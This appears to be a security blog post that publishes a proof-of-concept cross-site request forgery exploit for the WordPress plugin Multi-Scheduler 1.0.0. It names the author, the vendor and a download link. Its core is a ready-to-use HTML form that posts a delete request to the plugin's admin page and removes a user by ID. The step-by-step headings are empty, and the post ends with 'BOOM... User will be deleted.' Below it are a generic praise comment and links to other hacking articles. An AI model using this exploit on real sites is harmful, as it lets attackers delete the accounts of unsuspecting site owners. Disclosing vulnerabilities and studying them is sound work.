Sponsored
CVE (POC)

Exploit WordPress Plugin Multi-Scheduler 1.0.0 – CSRF (Delete User) (PoC)

Vulnerability Details :

The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.

  • Exploit Author: UnD3sc0n0c1d0
  • Vendor Homepage: https://www.bdtask.com/
  • Category: Web Application
  • Version: 1.0.0
  • Download – https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip

Full Proof of Concept (PoC)

Step -1

Step -2

Step -3

Step -4

 <form action="http://192.168.0.104:8081/wp-admin/admin.php?page=msbdt_professional" method="POST">
      <input type="hidden" name="pro&#95;delete&#95;id" value="1" />
      <input type="hidden" name="professional&#95;delete" value="Delete" />
      <input type="submit" value="Submit request" />
    </form>

Step -5

Step -6

BOOM 🙂 !! User will be deleted.

About the Author
Virat Sharma Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.
Sponsored

View Comments

  • I'm amazed, I must say. Rarely do I come across a blog that's both educative and amusing, and without
    a doubt, you have hit the nail on the head. The issue is something
    which too few people are speaking intelligently about.

    I'm very happy that I found this during my hunt for something regarding this.

Recent Posts

Termux Cheat Sheet for Hackers

Hey Folks :) !! In this article, we present the "Termux Cheat Sheet for Hackers"…

1 month ago

Cracking the X-Factor in Cybersecurity: How Humans are Protecting the Systems?

Amid the rapid advancement of technology, the significance of human involvement in cybersecurity frequently goes…

8 months ago

Cariddi – Hidden Endpoint Finder for Bug Hunting

Hey Folks, we are back today after such a long break, but don't worry we…

2 years ago

API Security Testing 101: Know Everything About API Security Testing!

The security of your API should be one of the top priorities of companies. Without…

2 years ago

7 Best Tools for Web Penetration Testing: Comprehensive Details

Hey Folks, In today's business world, it is essential to have an online presence. However,…

2 years ago

Cyber Security Audits: Everything You Need to Know About It

Hey Folks, Is your business prepared in case of a cyber attack? Many companies don't…

2 years ago
Sponsored

This website uses cookies.